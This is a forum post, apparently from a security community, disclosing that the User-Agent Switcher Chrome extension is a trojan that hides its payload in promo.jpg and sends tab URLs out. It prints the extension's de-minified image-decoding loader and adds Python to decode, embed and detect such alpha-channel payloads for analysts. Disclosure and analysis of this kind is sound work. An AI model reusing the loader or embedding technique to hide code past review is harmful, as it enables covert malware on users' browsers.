[Note] The Chrome extension User-Agent Switcher is a trojan
Posted on: 2017-9-10 09:26 4461
Source of this post: 35bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2$3x3X3g2^5i4K6u0W2j5$3!0E0i4K6u0r3N6q4)9J5c8U0x3^5z5e0x3@1x3q4)9K6c8X3k6J5L8$3#2Q4x3@1c8@1K9h3#2W2L8r3W2F1k6g2)9J5y4X3q4E0M7q4)9K6b7X3W2K6j5i4m8H3K9h3&6K6N6r3q4D9L8r3g2V1i4K6y4p5x3l9`.`.

Search the Chrome Web Store for User-Agent Switcher: the top-ranked extension (450,000 users) is a trojan...

To get past Chrome's review process, the author hid the malicious code inside promo.jpg.

Line 80 of background.js decrypts the malicious code out of this image and executes it:


// background.js, line 80 (de-minified): decodes the payload hidden in promo.jpg.
// t = image (or path), e = options object
t.prototype.Vh = function(t, e) {
    if ("" === '../promo.jpg') return "";
    // default to promo.jpg, resolve the path to an Image via r.Wk, default the options
    void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
    var n = this.ET,
        i = e.mp || n.mp,                  // payload bits stored per pixel
        o = e.Tv || n.Tv,                  // channel mode; 1 = alpha channel
        h = e.At || n.At,                  // bits per output character
        a = r.Yb(Math.pow(2, i)),          // 2^i: number of distinct values per pixel
        f = (e.WC || n.WC, e.TY || n.TY),  // terminator check callback
        u = document.createElement("canvas"),
        p = u.getContext("2d");
    // draw the image onto a hidden canvas so the raw pixel bytes can be read back
    if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
    e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
    var c = p.getImageData(0, 0, u.width, u.height),
        d = c.data,                        // RGBA bytes, 4 per pixel
        g = [];
    if (c.data.every(function(t) {
            return 0 === t
        })) return "";
    var m, s;
    // walk the alpha byte of every pixel (index 3, step 4) until the terminator;
    // an alpha value in [256 - 2^i, 255] encodes i payload bits
    if (1 === o)
        for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
    var v = "",
        w = 0,                             // bit accumulator
        y = 0,                             // number of bits collected so far
        l = Math.pow(2, h) - 1;            // mask for one h-bit character
    // pack the i-bit values little-endian into h-bit characters
    for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
    // anything shorter than 13 characters is discarded; otherwise flush the last partial character
    return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
}




It encrypts the URL and other details of every tab you open and sends them to af7K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6#2j5i4y4%4K9i4c8U0K9r3g2J5i4K6u0W2L8%4u0Y4i4K6u0r3L8r3!0Y4K9h3y4Q4x3V1k6H3j5h3N6W2i4K6u0r3k6r3q4@1j5b7`.`.

It also fetches promotion-link rules from 51cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4H3K9g2)9J5k6h3c8S2N6r3q4Q4x3X3c8E0L8$3&6A6N6r3!0J5i4K6u0W2K9h3&6X3L8#2)9J5c8X3q4H3K9g2)9J5c8X3u0Z5M7Y4g2D9k6g2)9K6c8Y4y4#2j5W2)9K6c8o6p5I4y4R3`.`.; when you open a site that matches those rules, it injects ads or even malicious code into the page.

Based on the information on threatbook ( cd5K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6^5i4K6u0W2N6r3S2J5k6h3q4@1j5X3!0G2K9#2)9J5k6h3y4F1i4K6u0r3k6r3!0E0j5h3W2F1i4K6u0r3j5i4m8A6i4K6u0W2k6r3q4@1j5g2)9J5k6r3#2G2L8X3W2@1L8%4u0Q4x3X3g2A6L8X3k6G2 ), I suspect the following extensions are also this author's work..

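As an added example (not code from the post or from the extension), the following Python re-implements the alpha-channel decoder shown above so an analyst can check an extension's images offline, together with a constructed test image and a simple heuristic for spotting carrier images. The function and parameter names, the sample image, and the terminator rule are assumptions: the excerpt's TY callback is not shown, so decoding stops at the first alpha value below the encoding range.

```python
import os

def decode_alpha_lsb(rgba, bits_per_pixel=2, bits_per_char=8, min_len=13):
    """Mirror of Vh: each alpha byte in [256 - 2^i, 255] carries i payload bits, packed
    little-endian into bits_per_char-wide characters. Assumption: the terminator callback
    (TY) is not in the excerpt, so decoding stops at the first alpha below the range."""
    a = 1 << bits_per_pixel                    # a = 2^i
    values = []
    for m in range(3, len(rgba), 4):           # m = 3, m += 4: alpha bytes only
        v = rgba[m] - (256 - a)                # d[m] - (255 - a + 1)
        if v < 0:
            break                              # out of range: treat as terminator
        values.append(v)
    out, w, y, mask = [], 0, 0, (1 << bits_per_char) - 1
    for g in values:
        w += g << y                            # append i bits to the accumulator
        y += bits_per_pixel
        if y >= bits_per_char:                 # one full character collected
            out.append(chr(w & mask))
            y %= bits_per_char
            w = g >> (bits_per_pixel - y)      # keep the leftover high bits
    if len(out) < min_len:                     # v.length < 13 -> ""
        return ""
    if w:
        out.append(chr(w & mask))
    return "".join(out)

def embed_alpha_lsb(message, rgba, bits_per_pixel=2, bits_per_char=8):
    """Test-fixture builder (constructed here, not from the extension): message
    bits go into the alpha bytes, followed by one zero alpha byte as terminator."""
    a, mask = 1 << bits_per_pixel, (1 << bits_per_char) - 1
    bits = [(ord(c) & mask) >> k & 1 for c in message for k in range(bits_per_char)]
    buf, n = bytearray(rgba), 0
    for m in range(3, len(buf), 4):
        if n >= len(bits):
            buf[m] = 0
            break
        buf[m] = 256 - a + sum(b << k for k, b in enumerate(bits[n:n + bits_per_pixel]))
        n += bits_per_pixel
    return bytes(buf)

def near_opaque_ratio(rgba, bits_per_pixel=2):
    """Heuristic: share of alpha bytes just below 255 but inside the encoding range."""
    lo, alphas = 256 - (1 << bits_per_pixel), rgba[3::4]   # ordinary art has few of these
    return sum(lo <= x < 255 for x in alphas) / len(alphas)

def sample_rgba(width=64, height=64):
    px = bytearray(os.urandom(width * height * 4))        # constructed: random colours
    px[3::4] = b"\xff" * (width * height)                  # fully opaque alpha
    return bytes(px)
```

A fully opaque image still decodes to 0xFF filler here because the real terminator check is unknown, which is why the heuristic on near-opaque alpha values is the more useful indicator when triaging an image.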


Latest replies (4)
#2 (2017-9-10 09:42)
Thanks
#3 (2017-9-10 10:23)
Thanks! Luckily I use Firefox!
#4 (2017-9-10 19:42)
Thanks! I happen to have this extension; I have hardly ever used it, but I swapped it out right away anyway
#5 (2019-6-3 11:21)
青眼白龙: Thanks! I happen to have this extension; I have hardly ever used it, but I swapped it out right away anyway
How can one detect this kind of trojan?